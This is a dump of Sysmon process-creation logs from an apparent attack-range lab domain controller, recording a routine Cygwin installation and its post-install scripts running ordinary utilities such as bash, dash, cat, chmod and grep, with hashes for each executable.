14:55:59.548{A8622C2F-53FF-6078-300B-00000000AE01}6652C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FF-6078-2F0B-00000000AE01}5800C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh" 154100x800000000000000054493Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.537{A8622C2F-53FF-6078-2F0B-00000000AE01}5800C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-2B0B-00000000AE01}5640C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh" 154100x800000000000000054482Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.529{A8622C2F-53FF-6078-2E0B-00000000AE01}1736C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FF-6078-2D0B-00000000AE01}4696C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh" 154100x800000000000000054471Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.517{A8622C2F-53FF-6078-2D0B-00000000AE01}4696C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc 
--noprofile "/etc/postinstall/000-cygwin-post-install.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-2B0B-00000000AE01}5640C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh" 154100x800000000000000054455Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.470{A8622C2F-53FF-6078-2B0B-00000000AE01}5640C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/000-cygwin-post-install.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000054443Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.395{A8622C2F-53FF-6078-2A0B-00000000AE01}6364C:\cygwin64\bin\mv.exe-----"C:\cygwin64\bin\mv.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9C3FAC81E10B930A3218459438012345,SHA256=65D525AA50EFE6EE796887C76E8F0E6B99D216018506BB59BF32562C3D32C071,IMPHASH=9C18D209F9C5FB9FE70B2F2187E63FC4{A8622C2F-53FF-6078-290B-00000000AE01}5404C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054433Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.388{A8622C2F-53FF-6078-290B-00000000AE01}5404C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe 
"/etc/postinstall/0p_update-info-dir.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-E10A-00000000AE01}3420C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_update-info-dir.dash" 154100x800000000000000054422Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.380{A8622C2F-53FF-6078-280B-00000000AE01}928C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FF-6078-270B-00000000AE01}5852C:\cygwin64\bin\sh.exe"C:\cygwin64\bin\sh.exe" 154100x800000000000000054412Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:59.364{A8622C2F-53FF-6078-270B-00000000AE01}5852C:\cygwin64\bin\sh.exe-----"C:\cygwin64\bin\sh.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53FF-6078-260B-00000000AE01}4344C:\cygwin64\bin\install-info.exe"C:\cygwin64\bin\install-info.exe" 154100x800000000000000054400Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:58.594{A8622C2F-53FE-6078-E00A-00000000AE01}1348C:\cygwin64\bin\mv.exe-----"C:\cygwin64\bin\mv.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9C3FAC81E10B930A3218459438012345,SHA256=65D525AA50EFE6EE796887C76E8F0E6B99D216018506BB59BF32562C3D32C071,IMPHASH=9C18D209F9C5FB9FE70B2F2187E63FC4{A8622C2F-53FE-6078-DF0A-00000000AE01}6076C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash" 154100x800000000000000053638Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.587{A8622C2F-53FE-6078-DF0A-00000000AE01}6076C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C107-00000000AE01}928C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash" 154100x800000000000000053626Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.548{A8622C2F-53FE-6078-DE0A-00000000AE01}6552C:\cygwin64\bin\rebase.exe-----"C:\cygwin64\bin\rebase.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=4A308037D2E4D064FCFA424E5C1BC040,SHA256=46411F6279D4E7FB525AFA36C607531209F90406399F9B5D410864F48FFF7AA1,IMPHASH=37A0EDB849270EF8EB9803223F088459{A8622C2F-53FE-6078-DD0A-00000000AE01}3304C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053616Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:58.541{A8622C2F-53FE-6078-DD0A-00000000AE01}3304C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053606Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.531{A8622C2F-53FE-6078-DC0A-00000000AE01}5744C:\cygwin64\bin\sort.exe-----"C:\cygwin64\bin\sort.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C16D6C2C86D1FD3F76F369B857FC51D2,SHA256=9CF25F5A9D0DD784BEE8278A61C2429CBF04C32D3407B78A9F3B1D0500F7ACCA,IMPHASH=BAA25F5285129EA97CBED20CD70B6EC7{A8622C2F-53FE-6078-DA0A-00000000AE01}1496C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053587Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.523{A8622C2F-53FE-6078-DB0A-00000000AE01}5640C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FE-6078-D80A-00000000AE01}5776C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053586Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:58.523{A8622C2F-53FE-6078-DA0A-00000000AE01}1496C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053567Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.515{A8622C2F-53FE-6078-D90A-00000000AE01}6268C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FE-6078-D70A-00000000AE01}4568C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053566Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.515{A8622C2F-53FE-6078-D80A-00000000AE01}5776C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053554Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:58.508{A8622C2F-53FE-6078-D70A-00000000AE01}4568C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053542Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.498{A8622C2F-53FE-6078-D60A-00000000AE01}4384C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-53FE-6078-D50A-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053532Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.491{A8622C2F-53FE-6078-D50A-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053522Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:58.482{A8622C2F-53FE-6078-D40A-00000000AE01}924C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53FE-6078-D30A-00000000AE01}1612C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053512Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.475{A8622C2F-53FE-6078-D30A-00000000AE01}1612C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053502Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.467{A8622C2F-53FE-6078-D20A-00000000AE01}6196C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FE-6078-D10A-00000000AE01}6748C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053492Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:58.460{A8622C2F-53FE-6078-D10A-00000000AE01}6748C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053480Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.451{A8622C2F-53FE-6078-D00A-00000000AE01}6084C:\cygwin64\bin\tr.exe-----"C:\cygwin64\bin\tr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=65789252526C9B5F8A73D99D53C2CC58,SHA256=464DA547E4E2B9B5E5E3C7B4773820257AAA39BCF85318B5CE86443E6EA5F3C7,IMPHASH=CDDCB078A4D97440CAEF0552021BCA5C{A8622C2F-53FE-6078-CE0A-00000000AE01}1156C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053461Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.444{A8622C2F-53FE-6078-CF0A-00000000AE01}5220C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FE-6078-CD0A-00000000AE01}3208C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053460Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:58.443{A8622C2F-53FE-6078-CE0A-00000000AE01}1156C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-CC0A-00000000AE01}6456C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053450Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.436{A8622C2F-53FE-6078-CD0A-00000000AE01}3208C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-CC0A-00000000AE01}6456C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053438Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.429{A8622C2F-53FE-6078-CC0A-00000000AE01}6456C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053426Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:58.421{A8622C2F-53FE-6078-CB0A-00000000AE01}6440C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FE-6078-CA0A-00000000AE01}6552C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053416Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.413{A8622C2F-53FE-6078-CA0A-00000000AE01}6552C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053404Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.404{A8622C2F-53FE-6078-C90A-00000000AE01}5312C:\cygwin64\bin\mv.exe-----"C:\cygwin64\bin\mv.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9C3FAC81E10B930A3218459438012345,SHA256=65D525AA50EFE6EE796887C76E8F0E6B99D216018506BB59BF32562C3D32C071,IMPHASH=9C18D209F9C5FB9FE70B2F2187E63FC4{A8622C2F-53FE-6078-C80A-00000000AE01}5744C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053394Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:58.397{A8622C2F-53FE-6078-C80A-00000000AE01}5744C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053384Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.381{A8622C2F-53FE-6078-C70A-00000000AE01}2408C:\cygwin64\bin\find.exe-----"C:\cygwin64\bin\find.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C17DC689E2E9C2AF759E7A3046DE8F1D,SHA256=77371827DA82B14D29999F738B77F53053833BE5C0257DC85E8A091ABB662789,IMPHASH=58AC74B0A7539EFE91A9196817FF689C{A8622C2F-53FE-6078-C60A-00000000AE01}6652C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053374Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.374{A8622C2F-53FE-6078-C60A-00000000AE01}6652C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053362Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:58.366{A8622C2F-53FE-6078-C50A-00000000AE01}3156C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53FE-6078-C40A-00000000AE01}4832C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053352Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.358{A8622C2F-53FE-6078-C40A-00000000AE01}4832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053342Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.350{A8622C2F-53FE-6078-C30A-00000000AE01}6852C:\cygwin64\bin\touch.exe-----"C:\cygwin64\bin\touch.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=B77F237C5CCC4E8AEFEBB51610AA86B6,SHA256=E3F5B7A0F6C406E4C04BE6E14BAFCA27F1BC7A5299BC7151B9604B58057E0D66,IMPHASH=CA44AAF41C04E9C1E85EC55456ECCF59{A8622C2F-53FE-6078-C20A-00000000AE01}6592C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053332Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:58.343{A8622C2F-53FE-6078-C20A-00000000AE01}6592C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053322Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.334{A8622C2F-53FE-6078-C10A-00000000AE01}5964C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53FE-6078-C00A-00000000AE01}6240C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053312Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 